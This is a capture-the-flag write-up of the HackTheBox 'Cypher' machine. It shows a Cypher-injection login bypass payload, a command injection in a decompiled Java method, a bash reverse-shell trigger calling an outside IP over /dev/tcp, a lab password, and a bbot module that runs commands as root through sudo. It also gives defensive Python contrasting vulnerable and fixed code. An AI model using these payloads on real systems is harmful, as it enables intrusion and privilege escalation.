Cypher Writeup

0x5t
Security Researcher
Team: RaptX
Joined: 2024
Tags: HackTheBox, Linux, Cypher, Cypher Injection, Command Injection, sudo

This medium-difficulty HackTheBox machine involves a Cypher injection to bypass authentication on a web application, followed by a command injection vulnerability in a custom Java method to gain a foothold as the neo4j user. Privilege escalation is achieved by exploiting a sudo misconfiguration on the bbot utility to execute a custom module as root.


Quick Metadata

Item Value
Machine Cypher
Difficulty Medium
IP 10.10.10.10
OS Linux
Primary Vulns Cypher Injection, Command Injection, sudo NOPASSWD misconfiguration (bbot)

Exploitation Chain (High-Level)

  1. Web enumeration reveals a login page for a custom application on cypher.htb.
  2. Cypher injection bypasses authentication, granting access to the application's query interface.
  3. A command injection vulnerability is discovered in a custom Java method within the application.
  4. The command injection is used to obtain a shell as the neo4j user.
  5. Credentials for the graphasm user are found in a bash_history file.
  6. A sudo misconfiguration allows graphasm to run /usr/local/bin/bbot as root.
  7. A custom bbot module is created and executed with root privileges to obtain the root flag.

Pre-Reqs

  • Tooling: nmap, feroxbuster, bbot, sudo
  • Skills: web application enumeration, source code analysis, command injection, sudo misconfiguration abuse

Skills Required

  • Web Exploitation
  • Source Code Analysis
  • Basic Linux Enumeration

Skills Learned

  • Cypher Injection
  • Java Source Code Analysis
  • Abusing a NOPASSWD sudo rule on bbot via a custom module

Enumeration

Network Scan

The initial Nmap scan reveals two open ports: SSH on port 22 and HTTP on port 80. The HTTP service is running on nginx and redirects to cypher.htb.

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.5 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    nginx 1.24.0 (Ubuntu)

Nmap Commands

nmap -Pn -sC -sV -oN scans/initial.nmap 10.10.10.10

Add host entry:

echo "10.10.10.10 cypher.htb" | sudo tee -a /etc/hosts

Web Enumeration

After adding the host entry and browsing to the site, a login form is presented. Submitting a single quote (') as the username returns a verbose backend error containing a Cypher syntax error. The error discloses the query the application builds: MATCH (u:USER)-[:SECRET]->(h:SHA1) WHERE u.name = '<USERNAME>' return h.value as hash, with the submitted username inserted into the string literal unescaped. The application then compares the SHA1 of the submitted password against the hash value this query returns.

Using feroxbuster (or similar tools) to fuzz the web root reveals a /testing directory. Inside this directory, a Java archive file custom-apoc-extension-1.0-SNAPSHOT.jar is found.

Credentials / Artifacts Discovered

Stage Credential / Token Usage
Foothold Cypher injection in the username field, password cypher (its SHA1 is supplied by the injected RETURN) Authentication bypass on the cypher.htb web application
Lateral graphasm:cU4btyib.20xtCMCXkBmerhK SSH login as graphasm
Priv Esc N/A sudo /usr/local/bin/bbot as root (NOPASSWD)

Foothold

Initial Vulnerability (Cypher Injection)

The leaked query structure can be abused to bypass the login. Because the application only checks that SHA1(password) equals the hash the query returns, the injection does not need a valid username at all: it needs the query to return a hash the attacker already knows. The payload closes the string literal, neutralises the WHERE clause with OR true, injects a RETURN of a chosen SHA1 literal as hash, and comments out the application's original RETURN clause with // (a Cypher line comment).

The injected literal is the SHA1 of the value typed into the password field (here cypher), so the comparison succeeds for any stored user.

Payload for username field: ' OR true return "93083541086a589b312bd3da38a8488d1fb14dcc" as hash; //

Password field: cypher

This payload authenticates successfully and grants access to the web application's query interface.
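As an added example (not the application's code), the Python below models the two ways of building the login query: string concatenation as the vulnerable app does it, and a parameterised query. Neo4j is not contacted; simulate_lookup and the FAKE_GRAPH dictionary are a constructed stand-in for the database that only models which value comes back as hash, which is enough to show why the injected RETURN wins and why a bound $username parameter cannot be abused the same way.

```python
"""Cypher injection on the leaked login query: vulnerable vs parameterised.

Added example. FAKE_GRAPH and simulate_lookup are a constructed model of the
database, not a Neo4j client.
"""
import hashlib
import re
from typing import Callable, Dict, Optional, Tuple

# Query shape disclosed by the application's error message
VULNERABLE_TEMPLATE = (
    "MATCH (u:USER)-[:SECRET]->(h:SHA1) WHERE u.name = '{username}' "
    "return h.value as hash"
)
# Same query with a bound parameter: the driver ships $username out of band,
# so it is always a value and never Cypher syntax
SAFE_QUERY = (
    "MATCH (u:USER)-[:SECRET]->(h:SHA1) WHERE u.name = $username "
    "return h.value as hash"
)

# Constructed stand-in for the graph: user name -> SHA1 hex of the real password
FAKE_GRAPH = {"admin": hashlib.sha1(b"not-the-real-password").hexdigest()}

# An injected `return "<sha1>" as hash; //` ends the statement and comments
# out the application's own RETURN clause
INJECTED_RETURN = re.compile(r'return\s+"([0-9a-f]{40})"\s+as\s+hash\s*;?\s*//')
LITERAL_NAME = re.compile(r"u\.name = '([^']*)'")

QueryBuilder = Callable[[str], Tuple[str, Dict[str, str]]]


def sha1_hex(text: str) -> str:
    return hashlib.sha1(text.encode()).hexdigest()


def build_query_unsafe(username: str) -> Tuple[str, Dict[str, str]]:
    """String concatenation, as the vulnerable application does it."""
    return VULNERABLE_TEMPLATE.format(username=username), {}


def build_query_safe(username: str) -> Tuple[str, Dict[str, str]]:
    """Parameterised query: the query text never changes, only the bound value."""
    return SAFE_QUERY, {"username": username}


def bypass_payload(password: str) -> str:
    """Username that makes the query return SHA1(password) as the stored hash."""
    return f'\' OR true return "{sha1_hex(password)}" as hash; //'


def simulate_lookup(query: str, params: Dict[str, str]) -> Optional[str]:
    """Model of what the database hands back as `hash` for this query text."""
    injected = INJECTED_RETURN.search(query)
    if injected:                         # attacker-controlled RETURN wins
        return injected.group(1)
    if "$username" in query:             # parameter lookup: value is opaque data
        return FAKE_GRAPH.get(params.get("username", ""))
    literal = LITERAL_NAME.search(query)  # plain literal lookup, no injection
    return FAKE_GRAPH.get(literal.group(1)) if literal else None


def login(username: str, password: str, builder: QueryBuilder) -> bool:
    """The application's check: SHA1(submitted password) == returned hash."""
    query, params = builder(username)
    stored = simulate_lookup(query, params)
    return stored is not None and stored == sha1_hex(password)


if __name__ == "__main__":
    print("unsafe, injected :", login(bypass_payload("cypher"), "cypher", build_query_unsafe))
    print("safe,   injected :", login(bypass_payload("cypher"), "cypher", build_query_safe))
    print(build_query_unsafe(bypass_payload("cypher"))[0])
```

With the parameterised builder the payload is simply a user name that does not exist, so the lookup returns nothing and the login fails; with concatenation the same string rewrites the query and the check passes for any user.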

Pivot to Command Injection

Decompiling custom-apoc-extension-1.0-SNAPSHOT.jar reveals a getUrlStatusCode method in the CustomFunctions class. The method takes a URL as an argument and concatenates it straight into a command string that is handed to /bin/sh -c without any validation or escaping.

// Decompiled CustomFunctions.getUrlStatusCode (quoting reconstructed from the decompiler output)
// The URL is appended to a string that /bin/sh parses, so shell metacharacters in it are executed
String[] command = {"/bin/sh", "-c",
    "curl -s -o /dev/null --connect-timeout 1 -w %{http_code} " + url};
Process process = Runtime.getRuntime().exec(command);

Because the string is interpreted by a shell, a semicolon ; in the URL terminates the curl command and whatever follows is run as a separate command (|, &&, $(...) and backticks would work just as well).
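As an added example (not the JAR's code), the Python below reproduces the getUrlStatusCode pattern and puts the two fixes beside it: dropping the shell in favour of an argv list, and allow-listing the URL before it reaches any subprocess. /bin/echo stands in for curl so the block runs offline; the payload string is constructed in the shape the writeup uses (example.com; command). The injection mechanics are the same as with sh -c and curl.

```python
"""Shell command injection via string concatenation, and its fixes.

Added example. /bin/echo replaces curl so the code runs offline; PAYLOAD is a
constructed sample in the shape used against getUrlStatusCode.
"""
import re
import subprocess
from urllib.parse import urlsplit

# RFC 1123 style host label check (no metacharacters survive this)
HOSTNAME = re.compile(
    r"^[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)

# Constructed payload: `;` ends the first command, the rest is a new command
PAYLOAD = "example.com; echo INJECTED"


def run_unsafe(url: str) -> str:
    """Vulnerable: the URL is glued onto a command string that /bin/sh parses,
    so ; | && $(...) `...` and newlines inside it become shell syntax."""
    command = "/bin/echo status " + url  # mirrors "curl ... -w %{http_code} " + url
    result = subprocess.run(["/bin/sh", "-c", command], capture_output=True, text=True)
    return result.stdout


def run_argv(url: str) -> str:
    """Fix 1: no shell at all. argv elements go to execve verbatim, so a ';'
    is just a byte inside the third argument."""
    result = subprocess.run(["/bin/echo", "status", url], capture_output=True, text=True)
    return result.stdout


def is_safe_url(url: str) -> bool:
    """Fix 2: allow-list the input. Only http(s) URLs with a clean host name,
    an optional numeric port, no credentials and no whitespace are accepted."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False
    if parts.username or parts.password:
        return False
    if not HOSTNAME.match(parts.hostname):
        return False
    try:
        port = parts.port  # raises ValueError for non-numeric or out-of-range ports
    except ValueError:
        return False
    if port is not None and not 1 <= port <= 65535:
        return False
    return not any(ch.isspace() for ch in url)


def run_safe(url: str) -> str:
    """Both fixes together: validate first, then exec without a shell."""
    if not is_safe_url(url):
        raise ValueError(f"rejected url: {url!r}")
    return run_argv(url)


if __name__ == "__main__":
    print("sh -c  :", repr(run_unsafe(PAYLOAD)))
    print("argv   :", repr(run_argv(PAYLOAD)))
    print("allowed:", is_safe_url(PAYLOAD), is_safe_url("https://example.com/health"))
```

Validation alone is not the real fix: a URL such as http://example.com/;id passes the host check because the metacharacter sits in the path, and only the absence of a shell makes that harmless. Keep both layers.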

Reverse Shell

The command injection is used to execute a reverse shell payload.

## Listener
nc -lvnp 9001
## Trigger
CALL custom.getUrlStatusCode('example.com; bash -c "bash -i >& /dev/tcp/11.11.11.11/9001 0>&1"')

Result: shell as neo4j user.

Shell Stabilization

python3 -c 'import pty,os; pty.spawn("/bin/bash")'
export TERM=xterm

Lateral Movement

Enumeration as Low-Priv User

A bash_history file is found in the neo4j user's home directory (/var/lib/neo4j). This file contains credentials for another user.

cat /var/lib/neo4j/.bash_history

The output reveals a neo4j-admin dbms set-initial-password command containing a password. This password, cU4btyib.20xtCMCXkBmerhK, is found to be valid for the graphasm user, another user discovered in /etc/passwd.

Pivot Technique (SSH)

The credentials are used to log in via SSH as the graphasm user.

ssh graphasm@10.10.10.10

Privilege Escalation

Vector 1: bbot sudo Misconfiguration

Enumerating the sudo permissions for the graphasm user reveals that they can run /usr/local/bin/bbot as root without a password.

sudo -l

Evidence:

User graphasm may run the following commands on cypher:
 (ALL) NOPASSWD: /usr/local/bin/bbot

bbot can load modules from additional directories listed under the module_dirs key of a preset, and enables them by name under modules. Since the sudo rule runs bbot as root, any Python file placed in such a directory executes as root once the module is loaded. Three pieces are needed: a preset YAML pointing at a writable module directory, a module whose class name matches its file name, and a scan invocation that gives the module an event to handle.

First, create a YAML file for the module configuration:

## /tmp/my_preset.yml
modules:
  - mymodule
module_dirs:
  - /tmp/my_modules

Next, create the Python module that contains the malicious payload:

## /tmp/my_modules/mymodule.py
from bbot.modules.base import BaseModule
import os


class mymodule(BaseModule):          # class name must match the file name (mymodule.py)
    watched_events = ["DNS_NAME"]    # the scan target is emitted as a DNS_NAME event

    async def handle_event(self, event):
        # Executed inside the bbot process, i.e. as root under the sudo rule
        os.system("cat /root/root.txt > /tmp/flag")

Exploit:

sudo /usr/local/bin/bbot -t cypher.htb -p /tmp/my_preset.yml --force

This runs bbot as root with the custom preset, which loads the module from /tmp/my_modules. A target is required because the payload lives in handle_event: the target is emitted as a DNS_NAME event, the module receives it, and the os.system call runs with root privileges, copying the root flag to /tmp/flag. --force tells bbot to keep going even if other modules fail their setup.

Post-Exploitation (Hashes / Loot)

The root flag is read from the /tmp/flag file created by the custom module.

cat /tmp/flag

Root Flag

13b2e3c91f90b77e1bd91c2243b41761



Summary

  1. A web application on cypher.htb was identified with a login page susceptible to Cypher injection.
  2. A successful Cypher injection was used to bypass authentication and gain access to the application's query functionality.
  3. Source code analysis of a JAR file found on the web server revealed a command injection vulnerability.
  4. The command injection was exploited to gain an initial shell as the neo4j user.
  5. Credentials for the graphasm user were discovered in the neo4j user's .bash_history file, allowing lateral movement via SSH.
  6. The graphasm user had NOPASSWD sudo privileges for the bbot utility, which was abused by loading a custom module to execute commands as root.

Lessons Learned

  • Insecure string concatenation in application code can lead to critical command injection vulnerabilities.
  • A NOPASSWD sudo rule on a tool that loads plugins or modules from user-controlled paths is equivalent to unrestricted root, however complex the tool.
  • Thorough enumeration of user files, such as .bash_history, can often yield valuable credentials or configuration details.